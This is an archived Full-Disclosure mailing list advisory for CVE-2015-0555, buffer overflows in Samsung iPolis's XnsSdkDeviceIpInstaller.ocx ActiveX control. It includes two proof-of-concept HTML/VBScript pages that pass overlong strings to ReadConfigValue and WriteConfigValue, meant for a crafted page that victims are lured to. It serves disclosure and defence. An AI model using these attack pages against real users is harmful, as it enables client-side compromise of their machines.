lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CABjjeykNjzrw664YGkrpbiuq+8EZaDmcmc3Q1+yV9JgRy2U=hw@mail.gmail.com> Date: Sat, 21 Feb 2015 00:47:20 +0530 From: Praveen D <praveend.hac@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities CVE-2015-0555 Introduction ************************************************************* There is a Buffer Overflow Vulnerability which leads to Remote Code Execution. Vulnerability is due to input validation to the API ReadConfigValue and WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx This is different from CVE-2014-3911 as the version of iPolis 1.12.2 (latest as of 12/12/2014). CVE-2014-3911 is related to different ActiveX and on older iPolis version Discovery MEthod: Fuzzing Exploiting: It is a client side attack where attacker can host a crafted HTML web page with malicious payload and entice the victim to browse to the hosted page to compromise the victim. Operating System: Windows 7 Ultimate N SP1 ************************************************************* Vulnerability1: *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution* ******************Proof of Concept (PoC)**************8 </html> <head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution</head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String" memberName = "ReadConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" argCount = 1 arg1=String(1044, "A") target.ReadConfigValue arg1 </script> </html> ***************************************************************************************** *Vulnerability2: * *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution * *******************Proof of Concept (PoC)********************* <html> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" argCount = 2 arg1=String(14356, "A") arg2="defaultV" target.WriteConfigValue arg1 ,arg2 </script></job></package> </html> **************************************************************************** CERT contacted Samsung but there wasn't any response from Samsung. Refer http://blog.disects.com for more details Best Regards, Praveen Darshanam _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists